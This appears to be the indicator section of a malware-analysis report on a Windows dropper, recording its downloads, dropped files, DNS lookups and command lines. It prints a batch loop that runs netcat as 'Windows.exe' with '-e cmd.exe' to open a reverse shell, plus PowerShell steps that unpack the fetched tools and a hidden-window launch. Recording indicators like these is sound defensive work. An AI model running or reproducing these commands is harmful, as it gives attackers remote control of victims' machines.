Technical Information
- https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip as windows.zip
- http://www.ni##oft.net/utils/nircmd.zip as windows2.zip
- %TEMP%\9836.tmp\down.bat
- %HOMEPATH%\windows2.zip
- %HOMEPATH%\windows.bat
- %HOMEPATH%\windows2.zip
- %TEMP%\9836.tmp\down.bat
- http://www.ni##oft.net/utils/nircmd.zip
- DNS ASK et####llybored.org
- DNS ASK ni##oft.net
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(Expand-Archive -Force %HOMEPATH%\windows2.zip %HOMEPATH%)"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\9836.tmp\down.bat" "<Full path to file>""' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\9836.tmp\down.bat" "<Full path to file>""
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(Expand-Archive -Force %HOMEPATH%\windows.zip %HOMEPATH%)"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(echo '@echo off')"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(echo ':localoop')"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(echo 'Windows.exe 192.168.1.37 8080 -e cmd.exe && goto localoop ')"